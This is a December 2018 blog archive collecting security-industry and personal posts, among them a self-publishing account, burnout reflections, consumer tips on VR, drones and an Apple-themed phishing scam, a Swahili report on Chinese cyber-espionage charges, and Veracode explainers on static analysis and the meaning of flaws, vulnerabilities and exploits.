Monthly Archives: December 2018

Notes on Self-Publishing a Book


In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.

As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.

I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. 14 years is an eternity in the publishing world, and even in the last 5 years the economics and structure of book publishing have changed quite a bit.

To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We met prior to my interest in this book, because I had wondered about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.

By the end of 2017, Anna and I were ready to begin work on the book. I believe our first "commits" occurred in December 2017.

For this stretching book project, I knew my strengths included organization, project management, writing to express another person's message, editing, and access to a skilled lead photographer. I learned that my co-author's strengths included subject matter expertise, a willingness to be photographed for the book's many pictures, and friends who would also be willing to be photographed.

None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.

Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.

After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.

I designed the structure of the book. As a former Air Force officer, I was comfortable with the "rule of threes," and brought some recent writing experience from my abandoned PhD thesis.

I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section -- something with Indian clubs, or kettle bells, or another supplement to stretching.

Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas -- tight hips, shoulders/back, and hamstrings. We encouraged the reader to "reach three goals" -- open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.

Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.

By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.

By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.

Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a "collector's edition" featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector's Edition. The second will be available at Amazon in January, and will feature black and white photographs.

While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)

Without revealing too much of the economic structure, I can say that it's much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.

Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.

The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.

In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.

The bottom line is that it's never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!

If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.

Update: Here is the Amazon listing.

Cross-posted from Rejoining the Tao Blog.

Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality 


Virtual and Augmented reality technology is changing the way we see the world.

You’ve probably heard the buzz around Virtual Reality (VR) and Augmented Reality (AR) and your child may have even put VR gear on this year’s wish list. But what’s the buzz all about and what exactly do parents need to know about these mind-bending technologies?

VR and AR technology sound a bit sci-fi and intimidating, right? They can be until you begin to understand the amazing ways these technologies are being applied to entertainment as well as other areas like education and healthcare. But, like any new technology, where there’s incredible opportunity there are also safety issues parents don’t want to ignore.

According to a report from Common Sense Media, 60 percent of parents are worried about VR’s health effects on children, while others say the technology will have significant educational benefits.

Virtual Reality

Adults and kids alike are using VR technology — headsets, software, and games — to experience the thrill of being in an immersive environment.

The Pokemon Go app uses AR technology to overlay characters on an existing environment.

According to Consumer Technology Association’s (CTA) 20th Annual Consumer Technology Ownership and Market Potential Study, there are now 7 million VR headsets in U.S. households, which equates to about six percent of homes. CTA estimates that 3.9 million VR/AR headsets shipped in 2017 and 4.9 million headsets will ship in 2018.

With VR technology, a user wears a VR Head Mounted Display (HMD) headset and interacts with 3D computer-generated environments on either a PC or smart phone that allows them to feel — or experience the illusion — that he or she is actually in that place. The VR headset has eye displays (OLED) for each eye that show an environment at different angles to give the perception of depth. VR environments are diverse. One might include going inside the human body to learn about the digestive system, another environment might be a battlefield, while another might be a serene ocean view. The list of games, apps, experiences, and movies goes on and on.

Augmented Reality

AR differs from VR in that it overlays digital information onto physical surroundings and does not require a headset. AR is transparent and allows you to see and interact with your environment. It adds digital images and data to enhance views of the real world. AR is used in apps like Pokémon Go and GPS and walking apps that allow you to see your environment in real time. Not as immersive as VR, AR can still enrich a physical reality and is finding its way into a number of industries. VR and AR technologies are used in education for e learning and in the military for combat, medic, and flight simulation training. The list of AR applications continues to grow.

To support these growing technologies, there are thousands of games, videos, live music and events available. Museums and arcades exist and theme parks are adapting thrill rides to meet the demand for VR experiences. Increasingly retailers are hopping on board to use VR to engage customers, which will be a hot topic at the upcoming 2019 Consumer Electronics Show (CES) in Las Vegas.

Still, there are questions from parents such as what effect will these immersive technologies have on children’s brains and if VR environments blur the line between reality and fantasy enough to change a child’s behavior. The answer: At this point, not a lot is known about VR’s affect on children but medical opinions are emerging warning of potential health impacts. So, calling a family huddle on the topic is a good idea you have these technologies in your home or plan to in the near future.

VR/AR talking points for families

Apply safety features. VR apps and games include safety features such as restricted chat and privacy settings that allow users to filter out crude language and report abusive behavior. While some VR environments have moderators in place, some do not. This is also a great time to discuss password safety and privacy with your kids.

The best way to understand VR? Jump in the fun alongside your kids.

Age ratings and reviews. Some VR apps or games contain violence so pay attention to age restrictions. Also, be sure to read the reviews of the game to determine the safety, quality, and value of the VR/AR content.

Inappropriate content. While fun, harmless games and apps exist, so too does sexual content that kids can and do seek out. Be aware of how your child is using his or her VR headset and what content they are engaged with. Always monitor your child’s tech choices.

Isolation. A big concern with VR’s immersive structure is that players can and do become isolated in a VR world and, like with any fun technology, casual can turn addictive. Time limits on VR games and monitoring are recommended.

Physical safety/health. Because games are immersive, VR players can fall or hurt themselves or others while playing. To be safe, sit down while playing, don’t play in a crowded space, and remove pets from the playing area.

In addition to physical safety, doctors have expressed VR-related health concerns. Some warn about brain and eye development in kids related to VR technology. Because of the brain-eye connection of VR, players are warned about dizziness, nausea, and anxiety related to prolonged play in a VR environment.

Doctors recommend adult supervision at all times and keeping VR sessions short to give the eyes, brain, and emotions a rest. The younger the child, the shorter the exposure should be.

Be a good VR citizen. Being a good digital citizen extends to the VR world. When playing multi-player VR games, be respectful, kind, and remember there are real hearts behind those avatars. Also, be mindful of the image your own avatar is communicating. Be aware of bullies and bullying behavior in a virtual world where the lines between reality and fantasy can get blurred.

Get in the game. If you allow your kids to play VR games, get immersed in the game with them. Understand the environments, the community, the feeling of the game, and the safety risks first hand. A good rule: If you don’t want your child to experience something in the real world — violence, cursing, fear, anxiety — don’t let them experience it in a virtual world.

To get an insider’s view of what a VR environment is like and to learn more about potential security risks, check out McAfee’s podcast Hackable?, episode #18, Virtually Vulnerable.

The post Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality  appeared first on McAfee Blogs.

McAfee 2018: Year in Review

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee events, discoveries, and product announcements have affected, educated, and assisted users and enterprises everywhere.

MPOWERing Security Professionals Around the World

Every year, security experts gather at MPOWER Cybersecurity Summit to strategize, network, and learn about innovative ways to ward off advanced cyberattacks. This year was no different, as innovation was everywhere at MPOWER Americas, APAC, Japan, and EMEA. At the Americas event, we hosted Partner Summit, where head of channel sales and operations for the Americas, Ken McCray, discussed the program, products, and corporate strategy. Partners had the opportunity to dig deeper into this information through several Q&A sessions throughout the day. MPOWER Americas also featured groundbreaking announcements, including McAfee CEO Chris Young’s announcement of the latest additions to the MVISION product family: MVISION® Endpoint Detection and Response (MVISION EDR) and MVISION® Cloud.

ATR Analysis

This year was a prolific one, especially for our Advanced Threat Research team, which unveiled discovery after discovery about the threat landscape, from ‘Operation Oceansalt’ delivering five distinct waves of attacks on victims, to Triton malware spearheading the latest attacks on industrial systems, to GandCrab ransomware evolving rapidly, to the Cortana vulnerability. These discoveries not only taught us about cybercriminal techniques and intentions, but they also helped us prepare ourselves for potential threats in 2019.

Progress via Products

2018 wouldn’t be complete without a plethora of product updates and announcements, all designed to help organizations secure crucial data. This year, we were proud to announce McAfee MVISION®, a collection of products designed to support native security controls and third-party technologies.

McAfee MVISION® Endpoint orchestrates the native security controls in Windows 10 with targeted advanced threat defenses in a unified management workflow to visualize and investigate threats, understand compliance, and pivot to action. McAfee MVISION®  Mobile protects against threats on Android and iOS devices. McAfee MVISION® ePO, a SaaS service, is designed to eliminate complexity by elevating management above the specific threat defense technologies with simple, intuitive workflows for security threat and compliance control across devices.

Beyond that, many McAfee products were updated to help security teams everywhere adapt to the ever-evolving threat landscape, and some even took home awards for their excellence.

All in all, 2018 was a great year. But, as always with cybersecurity, there’s still work to do, and we’re excited to work together to create a secure 2019 for everyone.

To learn more about McAfee, be sure to follow us at @McAfee and @McAfee_Business.

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

AI’s dark secret? A desire for data without bounds

AI offers the potential to help humankind in many ways. Driverless cars and smart infrastructure hold the promise to reduce congestion by facilitating the movement of people through cities. Improved diagnosis and treatments are increasing lifespans. In the enterprise, AI can help improve hiring decisions, make the factory floor safer, automate routine tasks, produce more objective performance reviews, and help organizations understand their customers.

New tools are appearing frequently. Amazon has been granted two patents for a wrist band that tracks workers’ hand movements as they pack boxes while filling orders. The wrist bands use radio frequency to track hand movement so precisely that the bands vibrate to nudge the hands in the proper direction when inefficient movements are detected. Humanyze sells sociometric badges that track employee movement through offices to provide insights regarding the quality of interactions with colleagues. L’Oréal’s UV Sense tracks the wearer’s exposure to ultraviolet rays then transfers the data to the user’s mobile phone. Cogito monitors the empathy displayed by customer service representatives handling calls.

To read this article in full, please click here

(Insider Story)

The #1 Gift Parents Can Give Their Kids This Christmas

quality time with kidsYou won’t see this gift making the morning shows as being among the top hot gifts of 2018. It won’t make your child’s wish list, and you definitely won’t have to fight through mall crowds to try to find it.

Even so, it is one of the most meaningful gifts you can give your child this year. It’s the gift of your time.

If we are honest, as parents, we know we need to be giving more of this gift every day. We know in our parenting “knower” that if we were to calculate the time we spend on our phones, it would add up to days — precious days — that we could be spending with our kids.

So this holiday season, consider putting aside your phone and leaning into your family connections. Try leaving your phone in a drawer or in another room. And, if you pick it up to snap a few pictures, return it to it’s hiding place and reconnect to the moment.

This truism from researchers is worth repeating: Too much screen time can chip away at our relationships. And for kids? We’ve learned too much tech can lead to poor grades, anxiety, obesity, and worse — feelings of hopelessness and depression.

Putting the oodles of knowledge we now have into action and transforming the family dynamic is also one of the most priceless gifts you can give yourself this year.

Here are a few ideas to inspire you forward:

  1. Take time seriously. What if we took quality time with family as seriously as we do other things? What if we booked time with our family and refused to cancel it? It’s likely our dearest relationships would soon reflect the shift. Get intentional by carving out time. Things that are important end up on the calendar so plan time together by booking it on the family calendar. Schedule time to play, make a meal together, do a family project, or hang out and talk.quality time with kids
  2. Green time over screen time. Sure it’s fun to have family movie marathons over the break but make sure you get your green time in. Because screen time can physically deplete our senses, green time — time spent outdoors — can be a great way to increase quality time with your family and get a hefty dose of Vitamin D.
  3. Aim for balance. The secret sauce of making any kind of change is balance. If there’s too much attention toward technology this holiday (yours or theirs), try a tech-exchange by trading a half-day of tech use for a half-day hike or bike ride, an hour of video games for an hour of family time. Balance wins every time, especially when quality time is the goal.
  4. Balance new gadget use. Be it a first smartphone, a new video game, or any other new tech gadget, let your kids have fun but don’t allow them to isolate and pull away from family. Balance screen time with face-to-face time with family and friends to get the most out of the holidays. Better yet: Join them in their world — grab a controller and play a few video games or challenge them to a few Fortnite battles.
  5. Be okay with the mess. When you are a parent, you know better than most how quickly the days, months, and years can slip by until — poof! — the kids are grown and gone. The next time you want to spend a full Saturday on chores, think about stepping over the mess and getting out of the house for some fun with your kids.

Here’s hoping you and your family have a magical holiday season brimming with quality time, laughter, and beautiful memories — together.

The post The #1 Gift Parents Can Give Their Kids This Christmas appeared first on McAfee Blogs.

SHUTMA ZA UJASUSI MTANDANO DHIDI YA UCHINA



KWA UFUPI: Australia, Marekani na Uingereza zimeitupia lawana nchi ya Uchina kuhusika na ujasusi mtandao katika mataifa yao na mataifa Rafiki – Shutma ambazo zime eleza uchina kuhusika na wizi wa taarifa za siri za kibiashara za serikali na makampuni ya Teknologia.
---------------------------
Niliwahi kueleza mara kadhaa mwelekeo mpya na hatari wa Uhalifu mtandao ambapo nilitahadharisha kuhusiana na vita mtandao (Cyber Warfare) pamoja na Ujasusi Mtandao (Cyber Espionage) ambavyo kwa sasa mataifa makubwa yanawekeza zaidi kwenye matumizi ya teknolojia kudhuru na kuingilia mataifa mengine kimtandao.

Kundi la APT-10 la uchina limeshutumiwa na Uingereza na Marekani kuingilia makampuni takriban 45 ya Teknolojia, Taarifa za wafanyakazi takriban laki moja za wanajeshi wa majini wa marekani pamoja na computer mbali mbali za shirika la NASA.



Zhu Hua pamoja na Zhang Shilong, ambao ni raia wa Uchina wameshtakiwa na Marekani kuhusika na kufanya mashambulizi mtandao kwaniaba ya wizara ya ulinzi ya uchina (Chinese Ministry of State Security) – Naibu Mwanashria mkuu wa Marekani , Bwana  Rod Rosenstein alielezea shutma hizo.


Uchina imekana kuhusika na shutma zinazotolewa dhidi yake na marekani pamoja na uingereza huku ikiitaka marekani kuwaachia raia wake wawili – Shutma ambazo  zimeelezwa athari zake zimekumba nchi nyingine takriban 12 ikiwemo Nchi ya Brazil, Japan, Ufaransa, Canada na Nyinginezo.

Aidha, Kumekua na shutma mfano wa hizi kutokea taifa moje dhidi ya Jingine ambapo Mataifa kama Urusi, Korea ya Kaskazini, Marekani, Uingereza, na Uchina zimekua zikitwajwa zaidi kua na tabia ya ujasusi mtandao – Huku ikionekana mataifa hayo yakiongeza nguvu na kujiimarisha kua na uwezo mkumbwa wa kufanya mashambulizi mtandao kwa mataifa mengine.



Sanjari na hili, tumeona ukuaji mkubwa makampuni kutoa huduma za kiuhalifu mtandao kama vile “Malware – as –a service”, “Ransomware – as – a service” na “Cyberattacks on demand” jambo ambalo limepelekea uhalifu mtandao kuendelea kushika kasi maeneo mengi duniani.

Hivi karibuni, Shirika la Kipelelezi la marekani (FBI) limefungia makampuni kadhaa yanayo jihusisha na huduma za kutoa msaada wa mashambulizi mtandao kwa wateja wake.

FBI, imeeleza makampuni yaliyo fungiwa yamekua yakijihusisha na huduma za kushambulia mashirika ya kifedha, Mashule, wakala wa serikali, watoa huduma za kimtandao nakadhalika.

critical-boot.com, ragebooter.com, downthem.org, and quantumstress.net ni baadhi tu ya waliokumbana na zilzala ya funga funga iliyofanywa na shirika la kipelezi la marekani (FBI) baada ya oparesheni kubwa kufanyika dhidi ya makampuni yanayo jihusisha na huduma za kihalifu mtandao.



Aidha, Katika kipindi hiki cha sikukuu za mwisho wa mwaka takwimu zimekua zikionyesha uhalifu mtandao unakua kwa kasi, na tumekua tukishuhudia matukio mengi ya kihalifu mtandao yanayopelekea upetevu mkubwa wa pesa na taafifa za watu binafsi pamoja na makampuni mbali mbali.

Nikitokea mfano kwa mataifa yetu ya Afrika mashariki, Nchini Kenya kwa mujibu wa takwimu zilizo tolewa na “Communications Authority of Kenya (CA)”, imeelezwa kubainika matukio ya kihalifu mtandao zaidi ya Milioni 3.8 kwa kipindi cha miezi mitatu pekee. Taarifa za Kina Juu ya hili zimechapishwa na "STANDARD MEDIA" ya Kenya.

Nitumie Fursa hii, Kushauri umakini zaidi wakati wa kutumia mitandao hususan huduma za kibenki za kimtandao na kuimarisha zaidi ulinzi wa mifumo yetu ya kimtandao ili kupunguza ukubwa wa tatizo.

Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat

As the Internet of Things works its way into almost every facet of our daily lives, it becomes more important to safeguard the IoT devices we bring into our homes. One device that has become increasingly popular among consumers is the drone. These remote-controlled quadcopters have enhanced the work of photographers and given technology buffs a new hobby, but what happens when these flying robots cause a safety hazard for others? That’s exactly what happened at the Gatwick airport on Wednesday night and again today when two drones were spotted flying over the airfield, causing all departing flights to remain grounded and all arriving flights to be diverted to other airports.

The drones were spotted flying over the Gatwick airport’s perimeter fence into the area where the runway operates from. This disruption affected 10,000 passengers on Wednesday night, 110,000 passengers on Thursday, and 760 flights expected to arrive and depart on Thursday. More than 20 police units were recruited to find the drone’s operator so the device could be disabled. The airport closure resulted in 31.9 hours with no planes taking off or landing between Wednesday and Thursday.

You might be wondering, how could two drones cause an entire airport to shut down for so long? It turns out that drones can cause serious damage to an aircraft. Evidence suggests that drones could inflict more damage than a bird collision and that the lithium-ion batteries that power drones could become lodged in airframes, potentially starting a fire. And while the probability of a collision is small, a drone could still be drawn into an aircraft turbine, putting everyone on board at risk. This is why it’s illegal to fly a drone within one kilometer of an airport or airfield boundary. What’s more, endangering the safety of an aircraft is a criminal offense that could result in a five-year prison sentence.

Now, this is a lesson for all drone owners everywhere to be cognizant of where they fly their devices. But beyond the physical implications that are associated with these devices, there are digital ones too — given they’re internet-connected. In fact, to learn about how vulnerable these devices can be, you can give our latest episode of “Hackable?” a listen, which explores the physical and digital implications of compromised drones,

Therefore, if you get a drone for Christmas this year, remember to follow these cybersecurity tips to ensure you protect them on the digital front.

  • Do your research. There are multiple online communities that disclose bugs and potential vulnerabilities as well as new security patches for different types of drones. Make sure you stay informed to help you avoid potential hacks.
  • Update, update, update! Just as it’s important to update your apps and mobile devices, it’s also important to update the firmware and software for your drone. Always verify the latest updates with your drone manufacturer’s website to make sure it is legitimate.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat appeared first on McAfee Blogs.

Managing Burnout

This is not strictly an information security post, but the topic likely affects a decent proportion of my readership.

Within the last few years I experienced a profound professional "burnout." I've privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout.

I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.

How did burnout manifest for me? It began with FireEye's acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December.

The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye's culture and managerial habits, and I wondered what I was doing inside such a different company.

(It's important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin's appointment was too late for me, but I applaud the work he has done over the last few years.)

Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.

At this time I was also working on my PhD with King's College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!

Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of informations security.

In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.

By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill "never, never, never give up" speech is fine advice when defending your nation's existence, but it's stupid advice if you're not happy with the path you're following.)

In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long-term. This was my break with the security community and I was happy to make it. I blogged on security only five more times in 2017.

(Incidentally, one very public metric for my burnout experience can be seen in my blog output. In 2015 I posted 55 articles, but in 2016 I posted only 8, and slightly more, 12, in 2017. This is my 21st post of 2018.)

I basically took a year off from information security. I did some limited consulting, but Mrs B paid the bills, with some support from my book royalties and consulting. This break had a very positive effect on my mental health. I stayed aware of security developments through Twitter, but I refused to speak to reporters and did not entertain job offers.

During this period I decided that I did not want to open a Krav Maga school and quit my school's instructor development program. For the second time, I had quit something I had once considered very important.

I started a new project, though -- writing a book that had nothing to do with information security. I will post about it shortly, as I am finalizing the cover with the layout team this weekend!

By the spring of 2018 I was able to consider returning to security. In May I blogged that I was joining Splunk, but that lasted only two months. I realized I had walked into another cultural and managerial mismatch. Near the end of that period, Seth Hall from Corelight contacted me, and by July 20th I was working there. We kept it quiet until September. I have been very happy at Corelight, finally finding an environment that matches my temperament, values, and interests.

My advice to those of you who have made it this far:

If you're feeling burnout now, you're not alone. It happens. We work in a stressful industry that will take everything that you can give, and then try to take more. It's healthy and beneficial to push back. If you can, take a break, even if it means only a partial break.

Even if you can't take a break, consider integrating non-security activities into your lifestyle -- the more physical, the better. Security is a very cerebral activity, often performed in a sedentary manner. You have a body and taking care of it will make your mind happier too.

If you're not feeling burnout now, I recommend preparing for a possible burnout in the future. In addition to the advice in the previous paragraphs, take steps now to be able to completely step away from security for a defined period. Save a proportion of your income to pay your bills when you're not working in security. I recommend at least a month, but up to six months if you can manage it.

This is good financial advice anyway, in the event you were to lose your job. This is not an emergency fund, though -- this is a planned reprieve from burnout. We are blessed in security to make above-average salaries, so I suggest saving for retirement, saving for layoffs, and saving for burnout.

Finally, it's ok to talk to other people about this. This will likely be a private conversation. I don't see too many people saying "I'm burned out!" on Twitter or in a blog post. I only felt comfortable writing this post months after I returned to regular security work.

I'm very interested in hearing what others have to say on this topic. Replying to my Twitter announcement for the blog post is probably the easiest step. I moderate the comments here and might not get to them in a timely manner.

Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat

With the holidays rapidly approaching, many consumers are receiving order confirmation emails updating them on their online purchases for friends and family. What they don’t expect to see is an email that appears to be a purchase confirmation from the Apple App Store containing a PDF attachment of a receipt for a $30 app. This is actually a stealthy phishing email, which has been circulating the internet, prompting users to click on a link if the transaction was unauthorized.

So how exactly does this phishing campaign work? In this case, the cybercriminals rely on the victim to be thrown off by the email stating that they purchased an app when they know that they didn’t. When the user clicks on the link in the receipt stating that the transaction was unauthorized, they are redirected to a page that looks almost identical to Apple’s legitimate Apple Account management portal. The user is prompted to enter their login credentials, only to receive a message claiming that their account has been locked for security reasons. If the user attempts to unlock their account, they are directed to a page prompting them to fill out personal details including their name, date of birth, and social security number for “account verification.”

Once the victim enters their personal and financial information, they are directed to a temporary page stating that they have been logged out to restore access to their account. The user is then directed to the legitimate Apple ID account management site, stating “this session was timed out for your security,” which only helps this attack seem extra convincing. The victim is led to believe that this process was completely normal, while the cybercriminals now have enough information to perform complete identity theft.

Although this attack does have some sneaky behaviors, there are a number of steps users can take to protect themselves from phishing scams like this one:

  • Be wary of suspicious emails. If you receive an email from an unknown source or notice that the “from” address itself seems peculiar, avoid interacting with the message altogether.
  • Go directly to the source. Be skeptical of emails claiming to be from companies asking to confirm a purchase that you don’t recognize. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Use a comprehensive security solution. It can be difficult to determine if a website, link, or file is risky or contains malicious content. Add an extra layer of security with a product like McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat appeared first on McAfee Blogs.

Carnegie Mellon’s Software Engineering Institute Report Shows Efficacy of Static Application Security Testing

A new report from Carnegie Mellon University’s Software Engineering Institute shows that automated, integrated Static Analysis improves software quality, reduces development time, and makes software more reliable and secure. By incorporating application security testing throughout the entirety of the Software Development Lifecycle (SDLC), organizations are able to ensure the security and quality of its software, and increasing speed-to-market.

The findings stand in support of what our own data and customer practices have shown. In the State of Software Security Volume 9, analysis of Veracode’s application testing data found that development teams that implemented DevSecOps practices fixed flaws 11.5 times faster than typical organizations. While Nichols’ report does not include vendor comparisons, it does provide an overall analysis on the total benefits of a secure development approach. 

Development teams at three organizations were observed, with each team using both static code analysis (SCA) and static binary analysis (SBA). The teams each used these software development tools at different times in the SDLC, across multiple and varying projects. The study found that applying the tools added no additional effort for development teams prior to release, and that as developers sharpened secure coding skills, false positive rates declined with cleaner code. It further recommends that organizations build and automate static testing into their workflows across the SDLC, continue to apply human analysis to testing results to ensure quality.

Three Must-Have Solutions to Kick-Off Your Application Security Program

Building and maturing an application security program might seem like a daunting project, but getting started is simpler than you think. There is an established series of steps most organizations take when developing their programs. Here are the three solutions we recommend to get you started in securing your business-critical applications:

1.Veracode Greenlight: Deliver applications faster and meet your development timelines by writing secure code the first time around. Veracode Greenlight, an IDE or CI integrated continuous flaw feedback and secure coding education solution, returns scans in seconds, which helps developers discern whether their code is secure. This solution helps teams maintain development velocity, reduce the number of flaws introduced into an application, and strengthens secure coding skills and practices. Learn more.

2.Static Analysis: Veracode static analysis enables you to quickly identify and remediate application security flaws at scale and with efficiency. Our SaaS-based platform integrates with development and security tools to make testing a seamless part of your process. Once flaws are identified, teams can leverage in-line remediation advice and one-to-one coaching to reduce mean time resolve. Learn more.

3.Software Composition Analysis: While the report found that SAST wasn’t the strongest solution to reducing the risk of open source components, modern software composition analysis is. Today, applications are more often assembled from other sources, and in a typical application, we’re seeing some comprised of up to 90 percent third-party code. Veracode’s SCA uses real machine learning and natural language processing to identify potential vulnerabilities in open source libraries with a high level of accuracy. By understanding the status of the components within an application, and if a vulnerable method is being called, organizations can prioritize fixes based on the riskiest use of components and maintain their speed-to-market. Learn more.

Applications continue to be one of the top attack vectors for malicious actors, and while there is no application security silver bullet, we can help you implement automated techniques and manual processes to ensure that your applications are secure. To start creating more secure software today and learn more about how our solutions can help drive down application risk in your organization, contact us.

Flaws and Vulnerabilities and Exploits – Oh My!

With the slew of terms that exist in the world of application security, it can be difficult to keep them all straight. “Flaws,” “vulnerabilities,” and “exploits” are just a few that are likely on your radar, but what do they mean? If you’ve used these words interchangeably in the past, you’re not alone. They’re easy to confuse with one another, likely because there’s a relationship between all of these terms, however, their distinction is real.

To give you a better idea of how to distinguish between these security issues and the different roles that they play within AppSec, let’s take a closer look at the similarities and differences between flaws, vulnerabilities, and exploits.

Flaws vs. Vulnerabilities

Flaws and vulnerabilities are perhaps the easiest two security defects to mix up, leading many security professionals to wonder what exactly is the difference between the two.

To put it simply, a flaw is an implementation defect that can lead to a vulnerability, and a vulnerability is an exploitable condition within your code that allows an attacker to attack. So, just because a flaw isn’t a vulnerability at the present moment, it doesn’t mean that it can’t become one in the future as environments and architectures change or get updated. Any updates to the architecture or changes in the function of your application can expose your application to attacks that were previously hidden.

Once someone has figured out a way to attack – or exploit – a flaw, the flaw becomes a vulnerability. If you’re still confused, think of it this way: all vulnerabilities are flaws, but not all flaws are vulnerabilities. All flaws have the potential to become vulnerabilities.

For some guidance when it comes to flaws, a helpful resource is MITRE’s Common Weakness Enumeration (CWE) list, which provides a common baseline standard for identifying different classes of weaknesses within application structures that can result in possible vulnerabilities.

Only when there is a realization of a structural defect that can allow for an attack to occur does a vulnerability arise. Vulnerabilities, similarly to flaws, are categorized by MITRE’s Common Vulnerabilities and Exposures (CVE) list. Generally, when we’re looking at CVE entries, these are recognized, publicly-known cybersecurity vulnerabilities within existing codebases. Additionally, you could reference the National Institute of Standards and Technology’s National Vulnerability Database (NVD), which is updated whenever a new vulnerability is added to the CVE dictionary of vulnerabilities. The NVD supplements the CVE list by conducting additional analysis on the vulnerabilities, and by determining the impact that vulnerabilities can have on an organization.

Exploits

“Exploit” is often used to describe weaknesses in code where hacking can occur, but in reality, it’s a slightly different concept. Rather than being a weakness in code, the term “exploit” refers to a procedure or program intended to take advantage of a vulnerability. Another way to think about it is this – an exploit is a vulnerability “weaponized” for a purpose, and this is because an exploit makes use of a vulnerability to attack a system.

So, to reiterate, rather than being the weakness in the code, an exploit is how you would attack that code. It allows an attacker to utilize the application’s logic against it in a way that was never intended by the developers.

